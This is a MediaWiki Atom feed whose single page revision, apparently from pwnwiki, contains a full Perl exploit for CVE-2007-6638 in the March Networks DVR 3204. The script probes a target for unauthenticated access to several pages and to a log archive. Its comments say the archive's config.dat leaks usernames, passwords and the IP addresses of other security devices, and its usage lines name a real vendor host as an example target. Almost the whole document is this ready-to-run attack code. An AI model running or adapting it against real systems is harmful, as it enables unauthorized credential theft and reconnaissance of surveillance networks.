<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="chinese">
	<id>https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=CVE-2007-6638_March_Networks_DVR_3204%E6%95%8F%E6%84%9F%E4%BF%A1%E6%81%AF%E6%B3%84%E6%BC%8F%E6%BC%8F%E6%B4%9E</id>
	<title>CVE-2007-6638 March Networks DVR 3204敏感信息泄漏漏洞 - Revision history</title>
	<link rel="self" type="application/atom+xml" href="https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=CVE-2007-6638_March_Networks_DVR_3204%E6%95%8F%E6%84%9F%E4%BF%A1%E6%81%AF%E6%B3%84%E6%BC%8F%E6%BC%8F%E6%B4%9E"/>
	<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=CVE-2007-6638_March_Networks_DVR_3204%E6%95%8F%E6%84%9F%E4%BF%A1%E6%81%AF%E6%B3%84%E6%BC%8F%E6%BC%8F%E6%B4%9E&amp;action=history"/>
	<updated>2026-04-10T09:51:27Z</updated>
	<subtitle>Revision history for this page on the wiki</subtitle>
	<generator>MediaWiki 1.35.1</generator>
	<entry>
		<id>https://pwnwiki.com/index.php?title=CVE-2007-6638_March_Networks_DVR_3204%E6%95%8F%E6%84%9F%E4%BF%A1%E6%81%AF%E6%B3%84%E6%BC%8F%E6%BC%8F%E6%B4%9E&amp;diff=848&amp;oldid=prev</id>
		<title>Pwnwiki: Created page with &quot;==EXP== &lt;pre&gt; #!/usr/bin/perl # # March Networks DVR 3204 Logfile Information Disclosure Exploit # # Since configuration of the IP address, user console and root is  # carried...&quot;</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=CVE-2007-6638_March_Networks_DVR_3204%E6%95%8F%E6%84%9F%E4%BF%A1%E6%81%AF%E6%B3%84%E6%BC%8F%E6%BC%8F%E6%B4%9E&amp;diff=848&amp;oldid=prev"/>
		<updated>2021-04-01T03:34:07Z</updated>

		<summary type="html">&lt;p&gt;Created page with &amp;quot;==EXP== &amp;lt;pre&amp;gt; #!/usr/bin/perl # # March Networks DVR 3204 Logfile Information Disclosure Exploit # # Since configuration of the IP address, user console and root is  # carried...&amp;quot;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;New page&lt;/b&gt;&lt;/p&gt;&lt;div&gt;==EXP==&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#!/usr/bin/perl&lt;br /&gt;
#&lt;br /&gt;
# March Networks DVR 3204 Logfile Information Disclosure Exploit&lt;br /&gt;
#&lt;br /&gt;
# Since configuration of the IP address, user console and root is &lt;br /&gt;
# carried out over the &amp;quot;administrator console&amp;quot;, the vulnerability &lt;br /&gt;
# lies within Watchdog's HTTP server application.&lt;br /&gt;
#&lt;br /&gt;
# Any user can obtain the log files without authentication by accessing&lt;br /&gt;
# the following PATH http:/dvraddress/scripts/logfiles.tar.gz. The intruder&lt;br /&gt;
# can then uncompress the tar file and access the config.dat to reveal&lt;br /&gt;
# username and passwords, names of devices, and IP addresses of other &lt;br /&gt;
# security components attached to the corporate networ&lt;br /&gt;
#&lt;br /&gt;
# More details: &lt;br /&gt;
# http://www.sybsecurity.com/resources/static/&lt;br /&gt;
# An_Insecurity_Overview_of_the_March_Networks_DVR-CCTV_3204.pdf&lt;br /&gt;
#&lt;br /&gt;
# By Alex Hernandez ahernandez [at] sybsecurity [dot] com&lt;br /&gt;
#&lt;br /&gt;
# Usage: perl -x dvr3204_exp.pl www.marchnetworks.com:80&lt;br /&gt;
# Usage: perl -x dvr3204_exp.pl 127.0.0.1:80&lt;br /&gt;
#&lt;br /&gt;
# $ perl -x dvr3204_exp.pl 10.50.10.246:80&lt;br /&gt;
# Trying...&lt;br /&gt;
#&lt;br /&gt;
# THIS HOST IS VULNERABLE!!! :-)&lt;br /&gt;
# Check the details on w w w [dot] sybsecurity [dot] c o m&lt;br /&gt;
#&lt;br /&gt;
# THIS HOST IS NOT VULNERABLE :-(&lt;br /&gt;
# Check the settings on browser...&lt;br /&gt;
#&lt;br /&gt;
# &lt;br /&gt;
&lt;br /&gt;
use Socket;&lt;br /&gt;
&lt;br /&gt;
if ($#ARGV&amp;lt;0) {die &amp;quot;&lt;br /&gt;
\nMarch Networks DVR 3204 exploit\n&lt;br /&gt;
More details: http://www.sybsecurity.com&lt;br /&gt;
By Alex Hernandez\n &lt;br /&gt;
ahernandez [at] sybsecurity [dot] com\n&lt;br /&gt;
&lt;br /&gt;
Usage: perl -x $0 www.marchnetworks.com:80&lt;br /&gt;
Usage: perl -x $0 127.0.0.1:80\n\n&amp;quot;;}&lt;br /&gt;
&lt;br /&gt;
($host,$port)=split(/:/,@ARGV[0]);&lt;br /&gt;
&lt;br /&gt;
print &amp;quot;Trying...\n\n&amp;quot;;&lt;br /&gt;
$target = inet_aton($host);&lt;br /&gt;
$flag=0;&lt;br /&gt;
&lt;br /&gt;
my @results=sendraw(&amp;quot;GET /Level1Authenticate.htm HTTP/1.0\r\n\r\n&amp;quot;);&lt;br /&gt;
foreach $line (@results){&lt;br /&gt;
 if ($line =~ /Directory/) {$flag=1;}}&lt;br /&gt;
&lt;br /&gt;
my @results=sendraw(&amp;quot;GET /UserAuthenticate.htm HTTP/1.0\r\n\r\n&amp;quot;);&lt;br /&gt;
foreach $line (@results){&lt;br /&gt;
 if ($line =~ /Directory/) {$flag=1;}}&lt;br /&gt;
&lt;br /&gt;
my @results=sendraw(&amp;quot;GET /public/index.htm HTTP/1.0\r\n\r\n&amp;quot;);&lt;br /&gt;
foreach $line (@results){&lt;br /&gt;
 if ($line =~ /Directory/) {$flag=1;}}&lt;br /&gt;
&lt;br /&gt;
my @results=sendraw(&amp;quot;GET /public/UpgradeStatus.htm HTTP/1.0\r\n\r\n&amp;quot;);&lt;br /&gt;
foreach $line (@results){&lt;br /&gt;
 if ($line =~ /Directory/) {$flag=1;}}&lt;br /&gt;
&lt;br /&gt;
my @results=sendraw(&amp;quot;GET /public/UpgradeHistory.htm HTTP/1.0\r\n\r\n&amp;quot;);&lt;br /&gt;
foreach $line (@results){&lt;br /&gt;
 if ($line =~ /Directory/) {$flag=1;}}&lt;br /&gt;
&lt;br /&gt;
my @results=sendraw(&amp;quot;GET /public/UpgradeHistory.txt HTTP/1.0\r\n\r\n&amp;quot;);&lt;br /&gt;
foreach $line (@results){&lt;br /&gt;
 if ($line =~ /Directory/) {$flag=1;}}&lt;br /&gt;
&lt;br /&gt;
my @results=sendraw(&amp;quot;GET /public/dvrlog HTTP/1.0\r\n\r\n&amp;quot;);&lt;br /&gt;
foreach $line (@results){&lt;br /&gt;
 if ($line =~ /Directory/) {$flag=1;}}&lt;br /&gt;
&lt;br /&gt;
my @results=sendraw(&amp;quot;GET /scripts/logfiles.tar.gz HTTP/1.0\r\n\r\n&amp;quot;);&lt;br /&gt;
foreach $line (@results){&lt;br /&gt;
 if ($line =~ /Directory/) {$flag=1;}}&lt;br /&gt;
&lt;br /&gt;
if ($flag==1){print &amp;quot;THIS HOST IS VULNERABLE!!! :-)\n&lt;br /&gt;
Check the details on www [dot] sybsecurity [dot] com\n&amp;quot;;}&lt;br /&gt;
else {print &amp;quot;THIS HOST IS NOT VULNERABLE :-( \n&lt;br /&gt;
Check the settings on browser...\n&amp;quot;;}&lt;br /&gt;
&lt;br /&gt;
sub sendraw {&lt;br /&gt;
        my ($pstr)=@_;&lt;br /&gt;
        socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) ||&lt;br /&gt;
                die(&amp;quot;Socket problems\n&amp;quot;);&lt;br /&gt;
        if(connect(S,pack &amp;quot;SnA4x8&amp;quot;,2,$port,$target)){&lt;br /&gt;
                my @in;&lt;br /&gt;
                select(S); $|=1; print $pstr;&lt;br /&gt;
                while(&amp;lt;S&amp;gt;){ push @in, $_;}&lt;br /&gt;
                select(STDOUT); close(S); return @in;&lt;br /&gt;
        } else { die(&amp;quot;Can't connect check the port or address...\n&amp;quot;); }&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
# milw0rm.com [2007-12-27]&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Pwnwiki</name></author>
	</entry>
</feed>